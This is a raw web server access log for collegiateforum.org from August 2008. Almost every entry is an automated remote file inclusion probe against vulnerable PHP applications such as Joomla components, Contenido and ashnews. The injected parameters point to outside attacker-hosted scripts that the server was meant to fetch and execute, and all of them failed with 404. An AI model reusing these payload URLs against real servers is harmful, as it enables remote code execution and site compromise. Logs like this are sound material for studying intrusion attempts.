200.14.46.18 - - [03/Aug/2008:19:33:53 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:35:14 -0700] "GET /logs/access_080519.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:19:36:07 -0700] "GET /templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:16 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:17 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:17 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:22 -0700] "GET /logs/access_071231.log//_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:22 -0700] "GET //_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:23 -0700] "GET /logs//_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:25 -0700] "GET /logs/access_071231.log/cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:25 -0700] "GET /cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:36:26 -0700] "GET /logs/cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
217.172.161.101 - - [03/Aug/2008:19:37:47 -0700] "GET /logs/access_080331.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.172.161.101 - - [03/Aug/2008:19:37:47 -0700] "GET /logs/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.172.161.101 - - [03/Aug/2008:19:38:09 -0700] "GET /logs/access_080211.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:38:12 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:38:12 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:38:12 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
72.232.178.178 - - [03/Aug/2008:19:39:26 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.232.178.178 - - [03/Aug/2008:19:39:27 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.232.178.178 - - [03/Aug/2008:19:39:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:40:57 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:40:57 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:40:57 -0700] "GET /logs//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.17.10.109 - - [03/Aug/2008:19:41:22 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.17.10.109 - - [03/Aug/2008:19:41:22 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.17.10.109 - - [03/Aug/2008:19:41:22 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
72.232.178.178 - - [03/Aug/2008:19:41:33 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
85.17.10.109 - - [03/Aug/2008:19:42:39 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:19:42:43 -0700] "GET /logs/access_080331.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:19:42:44 -0700] "GET /logs/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:19:43:04 -0700] "GET /logs/access_080211.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:43:05 -0700] "GET /logs/access_080121.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.73.187.48 - - [03/Aug/2008:19:43:12 -0700] "GET /logs/access_080121.log/modules/My_eGallery/public/displayCategory.php?basepath=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
69.73.187.48 - - [03/Aug/2008:19:43:12 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
69.73.187.48 - - [03/Aug/2008:19:43:12 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:43:59 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:43:59 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:43:59 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:44:54 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
67.18.151.242 - - [03/Aug/2008:19:44:55 -0700] "GET /logs/access.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.18.151.242 - - [03/Aug/2008:19:44:56 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.18.151.242 - - [03/Aug/2008:19:44:56 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
69.73.187.48 - - [03/Aug/2008:19:45:02 -0700] "GET /logs/access_080121.log/modules/My_eGallery/public/displayCategory.php?basepath=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
69.73.187.48 - - [03/Aug/2008:19:45:02 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
69.73.187.48 - - [03/Aug/2008:19:45:02 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
85.214.41.164 - - [03/Aug/2008:19:50:09 -0700] "GET /public/displayCategory.php?basepath=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
85.214.41.164 - - [03/Aug/2008:19:50:09 -0700] "GET /logs/public/displayCategory.php?basepath=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:50:16 -0700] "GET /logs/access_080121.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:19:50:28 -0700] "GET /logs/access_080121.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:19:50:28 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:19:50:28 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:55:00 -0700] "GET /logs/access_080121.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
72.243.169.10 - - [03/Aug/2008:20:01:08 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.243.169.10 - - [03/Aug/2008:20:01:08 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.18.81.164 - - [03/Aug/2008:20:02:00 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.18.81.164 - - [03/Aug/2008:20:02:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.18.81.164 - - [03/Aug/2008:20:02:00 -0700] "GET /logs/access_080121.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.18.81.164 - - [03/Aug/2008:20:02:20 -0700] "GET /logs/access_071231.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:20:08:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.146.105.237 - - [03/Aug/2008:20:11:47 -0700] "GET /index.php?menu=http://www.zeroweb.ro/infotur/wp-content/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
212.146.105.237 - - [03/Aug/2008:20:11:47 -0700] "GET /logs/access_080121.log/index.php?menu=http://www.zeroweb.ro/infotur/wp-content/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
212.146.105.237 - - [03/Aug/2008:20:11:51 -0700] "GET /logs/index.php?menu=http://www.zeroweb.ro/infotur/wp-content/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
81.21.5.198 - - [03/Aug/2008:20:12:11 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Opera/9.01 (Windows NT 5.1; U; en)" "www.collegiateforum.org"
212.117.89.191 - - [03/Aug/2008:20:14:33 -0700] "GET /logs/access_071231.log/config.php?path_to_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
212.117.89.191 - - [03/Aug/2008:20:14:33 -0700] "GET /config.php?path_to_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
212.117.89.191 - - [03/Aug/2008:20:14:34 -0700] "GET /logs/config.php?path_to_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
206.71.148.152 - - [03/Aug/2008:20:14:50 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:20:16:07 -0700] "GET /logs/access_071231.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:20:16:07 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:20:16:07 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:20:16:16 -0700] "GET /logs/access_080121.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
87.97.18.109 - - [03/Aug/2008:20:16:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.182.252.176 - - [03/Aug/2008:20:16:18 -0700] "GET /logs/access_080121.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.182.252.176 - - [03/Aug/2008:20:16:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
212.117.89.191 - - [03/Aug/2008:20:16:29 -0700] "GET /logs/access_080526.log/config.php?path_to_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.182.252.176 - - [03/Aug/2008:20:16:45 -0700] "GET /logs/access_071231.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:20:16:51 -0700] "GET //newspublish/include.php?path[docroot]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:20:16:51 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:20:16:51 -0700] "GET /logs/access_080324.log//newspublish/include.php?path[docroot]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:20:16:58 -0700] "GET /logs/access_080121.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:20:17:14 -0700] "GET /logs/access_080310.log//newspublish/include.php?path[docroot]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
206.71.148.152 - - [03/Aug/2008:20:17:55 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
206.71.148.152 - - [03/Aug/2008:20:17:55 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.119.177.12 - - [03/Aug/2008:20:18:10 -0700] "GET /logs/access_080121.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.119.177.12 - - [03/Aug/2008:20:18:10 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.119.177.12 - - [03/Aug/2008:20:18:10 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:20:18:51 -0700] "GET /logs/access_080121.log/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:20:18:51 -0700] "GET /logs/access_080121.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:20:19:00 -0700] "GET /logs/access_080121.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
217.172.161.101 - - [03/Aug/2008:20:26:35 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.172.161.101 - - [03/Aug/2008:20:26:36 -0700] "GET //_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.172.161.101 - - [03/Aug/2008:20:26:36 -0700] "GET /cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:20:27:01 -0700] "GET /logs/access_071231.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:20:27:11 -0700] "GET /logs/access_080121.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:20:29:41 -0700] "GET //config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:20:29:42 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:20:30:27 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:20:30:27 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:20:30:27 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
24.91.36.151 - - [03/Aug/2008:20:31:46 -0700] "GET /errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
24.91.36.151 - - [03/Aug/2008:20:31:48 -0700] "GET /logs/access_080324.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
24.91.36.151 - - [03/Aug/2008:20:31:48 -0700] "GET /logs/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:20:32:27 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:20:32:27 -0700] "GET /cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:20:32:27 -0700] "GET //_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:20:33:19 -0700] "GET /logs/access_080414.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:20:33:21 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:20:33:22 -0700] "GET /logs/access_080609.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
